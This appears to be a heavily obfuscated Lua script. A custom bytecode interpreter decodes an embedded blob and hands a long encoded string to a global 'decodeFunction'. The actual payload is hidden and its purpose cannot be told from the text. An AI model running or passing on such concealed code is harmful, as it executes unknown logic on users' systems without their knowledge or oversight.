2023-04-20 02:22:06 +08:00

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17 KiB

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==2) then function v23()local v31,v32=v1(v16,v19,v19 + 2 );v19=v19 + 1 + 1 ;return (v32 * (1142 -(825 + 61))) + v31 ;end v24=nil;function v24()local v33=(0 -0) -0 ;local v34;local v35;local v36;local v37;while true do if (v33==(0 -0)) then v34,v35,v36,v37=v1(v16,v19,v19 + 3 );v19=v19 + (575 -((375 -162) + 358)) ;v33=1;end if (v33==((1 -0) -0)) then return (v37 * (45336802 -28559586)) + (v36 * (63238 + 2298)) + (v35 * (991 -(592 + 143))) + v34 ;end end end v25=nil;v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v38)if (v1(v38,2)==79) then v20=v0(v3(v38,1,1));return "";else local v74=v2(v0(v38,16));if v20 then local v80=0;local v81;while true do if (1==v80) then return v81;end if (v80==0) then v81=v5(v74,v20);v20=nil;v80=1;end end else return v74;end end end);v21=nil;v18=1;end if (v18==5) then v30=nil;function v30(v39,v40,v41)local v42=v39[1];local v43=v39[2];local v44=v39[3];return function(...)local v68=0;local v69;local v70;local v71;local v72;local v73;while true do if (v68==3) then A,B=v28(v11(v73));if not A[1] then local v97=0;local v98;while true do if (v97==0) then v98=v39[4][v69] or "?" ;error("Script error at [" .. v98 .. "]:" .. A[2] );break;end end else return v13(A,2,B);end break;end if (v68==2) then v73=nil;function v73()local v86=v42;local v87=v43;local v88=v44;local v89=v28;local v90={};local v91={};local v92={};for v99=0 -0 ,v72 do if ((1877>((10456 -7209) -(1461 + 508))) and (v99>=v88)) then v90[v99-v88 ]=v71[v99 + (3 -(2 + 0)) ];else v92[v99]=v71[v99 + 1 + 0 + 0 ];end end local v93=(v72-v88) + (1681 -(20 + 1660)) ;local v94;local v95;while true do local v100=0 + 0 ;local v101;while true do if ((v100==(0 -0)) or ((7684 -3783)>(4991 -(11 + 575 + 147)))) then v101=(545 -(52 + 493)) -0 ;while true do if ((v101==(0 + (989 -(289 + 700)))) or ((2919 -(1351 + 36))>=(1945 + 1034))) then v94=v86[v69];v95=v94[1 -0 ];v101=1823 -(1676 + 146) ;end if (((1 + (1005 -(337 + 668)))==v101) or ((1416 + (1983 -1335))==(2020 + 1570))) then if (((3866 -(464 + 1341))>((3886 + 41) -2214)) and (v95<=(12 -9))) then if ((v95<=(230 -((202 -(46 + 63)) + 136))) or ((4986 -(701 + 337))==((117 + 7784) -2920))) then if (((4945 -(214 + 445))>=(7188 -3017)) and (v95==(1134 -(85 + 1049)))) then v69=v94[8 -5 ];else v92[v94[2]]();end elseif (((5494 -(63 + 11 + (2869 -1272)))==(10219 -6396)) and (v95>(2 + 0))) then v92[v94[970 -(513 + 88 + 367) ]]=v94[(1406 -356) -(855 + (554 -362)) ];else for v122=v94[5 -3 ],v94[801 -(45 + 753) ] do v92[v122]=nil;end end elseif ((v95<=(1073 -(558 + 510))) or (146>((22247 -16184) -((3245 -1886) + 57)))) then if (((2606 -(21 + 928 + 589))<=(2006 + 1263)) and (v95==(3 + 1))) then if (((222 + 3391 + 697)>(764 + 1163)) and (v92[v94[(551 -(516 + 34)) + 1 ]]==v94[4 + 0 ])) then v69=v69 + 1 + 0 ;else v69=v94[2 + 1 ];end else local v116=(1172 -(23 + 1149)) + 0 ;local v117;local v118;while true do if ((v116==(1 -(0 -0))) or ((1322 -(77 + 1067))>=(4465 -(597 + 164)))) then while true do if (((237 + 1977)==(13 + 284 + 1917)) and (v117==(1248 -(67 + 1181)))) then v118=v94[2 + 0 ];v92[v118]=v92[v118](v92[v118 + (1 -0) ]);break;end end break;end if ((v116==(0 -0)) or ((683 -448)>=(2149 -(377 + 179)))) then v117=1065 -(452 + 613) ;v118=nil;v116=1 + 0 ;end end end elseif ((367>=(172 + 147)) and (v95<=(2 + 1 + 3))) then do return;end elseif ((v95==(17 -10)) or ((723 -(87 + 63 + 168))<(49 + 7 + 16))) then v92[v94[8 -6 ]]=v41[v94[8 -5 ]];else v92[v94[6 -(9 -5) ]]=v92[v94[(2230 -(1055 + 571)) -(425 + 176) ]];end v69=v69 + (824 -(219 + (617 -(4 + 9)))) ;break;end end break;end end end end v68=3;end if (v68==1) then v71={...};v72=v12("#",...) -1 ;v68=2;end if (v68==0) then v69=1;v70= -1;v68=1;end end end;end return v30(v29(),{},v17)(...);end if (v18==3) then function v25()local v45=v24();local v46=v24();local v47=1 -0 ;local v48=(v21(v46,1189 -(567 + 621) ,31 -11 ) * (2^(593 -(459 + 102)))) + v45 ;local v49=v21(v46,(909 -(792 + 51)) -45 ,31);local v50=((v21(v46,(180 -100) -48 )==(1 -0)) and -(1 -0)) or ((4 -3) + 0) ;if (v49==(1309 -(650 + 659))) then if (v48==(0 + (1917 -(1453 + 464)))) then return v50 * (1845 -((1127 -(160 + 30)) + 908)) ;else v49=(3 + 1) -3 ;v47=0 + 0 ;end elseif (v49==((12268 -9312) -(461 + 448))) then return ((v48==(532 -(162 + (1009 -639)))) and (v50 * ((3 -2)/(1104 -(314 + 790))))) or (v50 * NaN) ;end return v8(v50,v49-1023 ) * (v47 + (v48/(((3 -2) + 1)^(43 + 9)))) ;end v26=nil;function v26(v51)local v52=0 + (0 -0) ;local v53;local v54;while true do if (v52==(2 -0)) then v54={};for v82=947 -(833 + 113) , #v53 do v54[v82]=v2(v1(v3(v53,v82,v82)));end v52=2 + 1 ;end if ((0 + 0)==v52) then v53=nil;if not v51 then local v96=0 -(419 -(148 + 271)) ;while true do if (v96==(0 + 0)) then v51=v24();if (v51==0) then return "";end break;end end end v52=713 -(301 + 411) ;end if (v52==1) then v53=v3(v16,v19,(v19 + v51) -(434 -(50 + (1046 -(487 + 176)))) );v19=v19 + v51 ;v52=1 + 1 ;end if (v52==(1674 -(376 + 1295))) then return v6(v54);end end end v27=v24;v18=4;end if (1==v18) then function v21(v55,v56,v57)if v57 then local v75=(v55/((7 -5)^(v56-(1 + 0))))%((4 -2)^(((v57-(1 + 0)) -(v56-(1550 -(505 + 1044)))) + 1 + 0)) ;return v75-(v75%1) ;else local v76=2^(v56-(2 -1)) ;return (((v55%(v76 + v76))>=v76) and (2 -1)) or (0 + 0 + (828 -(541 + 287))) ;end end v22=nil;function v22()local v58=0 + 0 ;local v59;while true do if (v58==(0 + 0)) then v59=v1(v16,v19,v19);v19=v19 + (221 -(173 + 47)) ;v58=(1 + 0) -0 ;end if (v58==1) then return v59;end end end v23=nil;v18=2;end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v60=1144 -(76 + 1068) ;local v61;local v62;local v63;local v64;local v65;local v66;local v67;while true do if (v60~=(1 + 2)) then else v67=nil;while true do local v84=0 + 0 ;local v85;while true do if ((0 + 0)~=v84) then else v85=0;while true do if (v85~=1) then else if (v61==(1 + 0)) then local v110=0;local v111;while true do if (v110==0) then v111=0 + 0 ;while true do if (v111==(0 -0)) then local v119=0;local v120;while true do if (v119~=0) then else v120=794 -(589 + 205) ;while true do if (v120~=1) then else v111=1;break;end if (v120==0) then local v143=16 -(5 + 11) ;while true do if (v143==0) then v66=v24();v67={};v143=1 + 0 ;end if (1~=v143) then else v120=1;break;end end end end break;end end end if (v111~=1) then else local v121=0 + 0 ;while true do if (1==v121) then v111=2;break;end if (0~=v121) then else for v135=1,v66 do local v136=0 + 0 ;local v137;local v138;local v139;local v140;while true do if (0==v136) then v137=0;v138=nil;v136=1575 -(290 + 1284) ;end if (v136~=(1375 -(1239 + 134))) then else while true do if (v137==1) then v140=nil;while true do if (v138~=1) then else if (v139==(2 -1)) then v140=v22()~=0 ;elseif (v139==2) then v140=v25();elseif (v139==(2 + 1)) then v140=v26();end v67[v135]=v140;break;end if (v138==0) then local v150=0 -0 ;local v151;while true do if (v150==(0 + 0)) then v151=0 -0 ;while true do if (v151==(1025 -(170 + 854))) then v138=1;break;end if (0==v151) then local v157=0;while true do if (v157==(1649 -(935 + 713))) then v151=1;break;end if (v157~=(1697 -(397 + 1300))) then else v139=v22();v140=nil;v157=1 + 0 ;end end end end break;end end end end break;end if ((0 -0)~=v137) then else local v147=0 -0 ;while true do if (v147~=(0 + 0)) then else v138=0;v139=nil;v147=1;end if (v147==(757 -(568 + 188))) then v137=1 + 0 ;break;end end end end break;end if (v136==1) then local v144=785 -(137 + 648) ;while true do if (v144~=(4 -3)) then else v136=1820 -(194 + 1624) ;break;end if (v144~=(306 -(52 + 254))) then else v139=nil;v140=nil;v144=1;end end end end end v65[3]=v22();v121=490 -(89 + 400) ;end end end if (v111~=2) then else v61=1668 -(684 + 982) ;break;end end break;end end end break;end if (v85==0) then local v106=0;local v107;while true do if (v106==(0 + 0)) then v107=74 -(43 + 31) ;while true do if (v107~=0) then else local v112=0;while true do if (1==v112) then v107=1;break;end if (v112==0) then if (v61==(1477 -(77 + 1398))) then local v130=858 -(16 + 842) ;local v131;local v132;while true do if (v130~=1) then else while true do if (v131~=0) then else v132=0 -0 ;while true do local v148=1977 -(922 + 1055) ;while true do if (v148~=(0 -0)) then else if (v132==(1 + 0)) then for v155=2 -1 ,v24() do v64[v155]=v24();end return v65;end if (v132==(0 + 0)) then local v152=0 -0 ;local v153;while true do if ((0 + 0)~=v152) then else v153=0;while true do if (v153==1) then v132=1;break;end if (v153~=(0 -0)) then else local v158=0 -0 ;while true do if (v158~=(1816 -(1778 + 37))) then else v153=73 -(15 + 57) ;break;end if (v158==0) then for v159=1 -0 ,v24() do local v160=0 + 0 ;local v161;local v162;while true do if (1==v160) then while true do if (v161==0) then v162=v22();if (v21(v162,1,1 -0 )==0) then local v165=783 -(334 + 449) ;local v166;local v167;local v168;local v169;local v170;while true do if (v165~=(6 -4)) then else v170=nil;while true do if (v166==2) then while true do if (v167==2) then local v172=94 -(37 + 57) ;local v173;local v174;while true do if ((0 + 0)==v172) then v173=0;v174=nil;v172=1 + 0 ;end if (v172~=(555 -(105 + 449))) then else while true do if (v173~=(1913 -(1411 + 502))) then else v174=1742 -(661 + 1081) ;while true do if (v174==0) then local v184=0;while true do if ((1550 -(302 + 1247))~=v184) then else v174=1;break;end if (v184~=(793 -(506 + 287))) then else if (v21(v169,1 + 0 ,1 + 0 )==1) then v170[2]=v67[v170[2]];end if (v21(v169,2,1869 -(277 + 1590) )==1) then v170[1 + 2 ]=v67[v170[1 + 2 ]];end v184=1;end end end if ((1 + 0)~=v174) then else v167=3;break;end end break;end end break;end end end if (v167==3) then if (v21(v169,532 -(359 + 170) ,8 -5 )~=1) then else v170[13 -9 ]=v67[v170[4]];end v62[v159]=v170;break;end if (v167==1) then local v176=0;local v177;while true do if (v176==0) then v177=10 -(8 + 2) ;while true do if (v177==1) then v167=135 -(88 + 45) ;break;end if (v177~=(0 + 0)) then else local v183=993 -(228 + 765) ;while true do if (v183==0) then v170={v23(),v23(),nil,nil};if (v168==0) then local v187=0;local v188;local v189;while true do if (v187==(1114 -(288 + 825))) then while true do if (v188==(1408 -(1162 + 246))) then v189=1751 -(472 + 1279) ;while true do if (v189~=0) then else v170[3 -0 ]=v23();v170[4]=v23();break;end end break;end end break;end if (v187==0) then v188=0 -0 ;v189=nil;v187=1822 -(89 + 1732) ;end end elseif (v168==1) then v170[5 -2 ]=v24();elseif (v168==(3 -1)) then v170[1732 -(1250 + 479) ]=v24() -(2^(40 -24)) ;elseif (v168~=3) then else local v196=0;local v197;local v198;while true do if (1~=v196) then else while true do if (v197==0) then v198=0 -0 ;while true do if ((0 + 0)==v198) then v170[3]=v24() -(2^(198 -(23 + 159))) ;v170[4]=v23();break;end end break;end end break;end if (v196==0) then v197=0 + 0 ;v198=nil;v196=1 + 0 ;end end end v183=1 -0 ;end if (v183==1) then v177=1;break;end end end end break;end end end if (v167==(0 + 0)) then local v178=0;local v179;local v180;while true do if (v178==0) then v179=0 -0 ;v180=nil;v178=1 -0 ;end if (v178==(2 -1)) then while true do if (v179==0) then v180=0;while true do if (v180==(0 -0)) then local v185=0;local v186;while true do if (v185==(1731 -(626 + 1105))) then v186=503 -(321 + 182) ;while true do if (v186==1) then v180=1;break;end if (v186==(0 -0)) then v168=v21(v162,1948 -(809 + 1137) ,3);v169=v21(v162,4,6);v186=1;end end break;end end end if (v180==1) then v167=1;break;end end break;end end break;end end end end break;end if (v166~=(928 -(335 + 592))) then else v169=nil;v170=nil;v166=2;end if (v166==(0 -0)) then local v171=0;while true do if (v171~=1) then else v166=1738 -(1190 + 547) ;break;end if (v171~=(0 + 0)) then else v167=933 -(660 + 273) ;v168=nil;v171=2 -1 ;end end end end break;end if (v165==(1360 -(786 + 573))) then v168=nil;v169=nil;v165=2;end if (v165==(0 -0)) then v166=0 + 0 ;v167=nil;v165=1;end end end break;end end break;end if ((1865 -(226 + 1639))==v160) then v161=0 + 0 ;v162=nil;v160=1 + 0 ;end end end for v163=1,v24() do v63[v163-(1 -0) ]=v29();end v158=1 + 0 ;end end end end break;end end end break;end end end break;end end break;end if (v130==0) then v131=0;v132=nil;v130=1;end end end if (v61==(0 -0)) then local v133=0 -0 ;local v134;while true do if (v133==(443 -(60 + 383))) then v134=738 -(192 + 546) ;while true do if (v134==(1 + 1)) then v61=1;break;end if (v134==(0 + 0)) then local v145=1033 -(385 + 648) ;local v146;while true do if (v145~=0) then else v146=0 + 0 ;while true do if (v146==(365 -(82 + 282))) then v134=2 -1 ;break;end if (v146==(0 -0)) then local v154=0;while true do if (v154==1) then v146=1;break;end if (v154~=(0 -0)) then else v62={};v63={};v154=4 -3 ;end end end end break;end end end if (v134==(3 -2)) then v64={};v65={v62,v63,nil,v64};v134=6 -4 ;end end break;end end end v112=1 -0 ;end end end if (v107==(2 -1)) then v85=810 -(690 + 119) ;break;end end break;end end end end break;end end end break;end if (v60==(2 + 0)) then local v77=0 + 0 ;while true do if ((1149 -(441 + 707))==v77) then v60=3;break;end if (0==v77) then v65=nil;v66=nil;v77=1585 -(1165 + 419) ;end end end if ((0 -0)==v60) then local v78=0 + 0 ;while true do if (v78==(579 -(197 + 382))) then v61=1896 -(1881 + 15) ;v62=nil;v78=1;end if (v78==1) then v60=1618 -(857 + 760) ;break;end end end if (v60==1) then local v79=0;while true do if (v79~=0) then else v63=nil;v64=nil;v79=848 -(384 + 463) ;end if (v79==(1 -0)) then v60=1623 -(596 + 1025) ;break;end end end end end v18=5;end end end v15("LOL!033O00028O00030E3O006465636F646546756E6374696F6E0375062O00632D6F43732D454A482E36683542795E2D23414F31432D4A3B785477256C61734032494E52584D5D255B4D326C7263787175675E732B64635821435B494758565D5323492341576B5761526964563A544A6A38354C355E632B4E336D5F2O63315A567A5F763B3D47715B4F5A576E65302E5E3A3F2473646C7A50246E24653B7A2A7874343172645172593D6E5051447750315B36534477505A3B21563B6734254758516F5D527572674944706953242E52734150472A793B423653416A296A4138254C536E575240213F3B3773627562236B767A2E544F4E71286F2950636B5D392F2C44735363674B643B4A707A6B374878233F46334E4653513B2C4C534C2F24646C2E392871525749762F34656C3F7831745A4E497B715D6635364C654F4A312C3A59476F5B4C672F2D7866465171542O5D6E5F324D78422E373B2F2C2B47445870342A444F532B6D30342F72472C777031445B55627B502957387B2O79282C785551246E5A655E327B2C325D3D232E33704770522F78734C3457426E51746C676466566C63367B4D723B4B2A666C402E2A6A342D6D246B35687B4B5A4B7A7B2D242A2E3D556D38684C7654252E6B6F547D6462536D7D65724875216624294D4F5564795F2O69394769756965496F4466286F57484C5D702B6738626B717B38486F544128596C7B556A5D62342B6A3728643D2A677B2O524E4D4A2C402B714E41784C2A376D4C666C4C74566C37683064495B7A706E4A4B563D682C4945704E472528465A757B2166335476775832344D625B364D56675E6C43522976245E5D75593846654B3976526F3157246B386E5437315925392F682129283B5F463D7A2B716F2F50745A34644467587D4D2B24507B2O2B537763694239763A4E7A7539646F582B584455643B212B707A233861252C542F3978556641372A397D45737857293B7856702446513B7834576C4D4662787A73646F45765D5E3A2164636E6C65675B244F766E7D39473A2E24406447293F693F523B675E704E6A526257257A7B5E555847516456686E7B44332921773433306B302O342C43354724422E2F333D762B577942635A4230556143747A3B55447438416B34615773234B666570406D72497A317D7848384D542O65552E39627349654B4243347A6D48307B3A73797261464C3653507A3148243A492C6778513441555A642F467754464D2O392E424E6373595E2B4F4E2A253642484A624B35732D5951552B413933396C4D7A49426B48633852717531465E4C63543A68587953587129403B2E2O216F6C566743642D3B53246C643B5D286E6C2E2O2145484B52394C494B3B4B3235652C724B666A5F21526E7673336D3B7741612A3B2E7A675633322D475F2O6C63412355774E672C73552O4079584B54556F5E2D697A65787756626C7A44284C61795544463D492C35403F524F62585B3B564F732F61215E6350235B3F3B55566D4A6D5829575E59303D63282528385324303A514363427444766E2852662D3463447435535632522C724B57404B3A664A32633B3D4B5D65447740624B5B5E3D6478335225445E5A4F2B4C3D7B5B2430635664344740444A615A796A532864395B58626B4C5F6B245D2E4C503F5642467768654F532364782F21256247356446424A5564254F62455459326F2B4F5F2B6764795F45742441212E7A6E294A3B593F4221506A545E2B2A25413A595175573B3A7343542163543D2E2F29675B78314F63694F233A562F65554D7D576C36445B7153333B674D693374547A462C6E382B442D705B544E462B2O4D6975452E6F38345D284A372A765763567A473D4857467856556A786D2B453B542128667164495159685E2C217728747035493F505A76432B695021645D396D785E6A30655E5F444D2O695847515B6465557D5837627A6D393867784C5A3D2A50762O2E5D442A722C24726C67612D472B402F4065294A7457724C5476542C5D5A2955375A64235765596D5D593261307466242A402A2E5842683921296F242O4F727A7B3F754A2123743B2B5A287B532E596F5F575E40343A3554334743335B724244425F2O3136492A49423F45415E4D4C674576772157705B403A62656E59483F56424E28253863433524397B6C627764427B3450374D6D685A5D73356D725E464E2A282D6D324B337750653A412A77432B65465354564B445B7D503B2E24732C4D69342B4F39734159387D695470456355212B546D4836793A5B676B5172304F76576C334D2C503266544356424B686E673023696F3F7B2D3661216A722C673842285F48212E6B2D5D5F286F462562000D3O0012033O00014O0002000100013O0026043O00020001000100044O00020001001207000200023O001203000300034O00050002000200022O0008000100024O0008000200014O000100020001000100044O000C000100044O000200012O00063O00017O000D3O00023O00033O00053O00053O00063O00063O00063O00063O00073O00073O00083O00093O000B3O00",v9(),...);end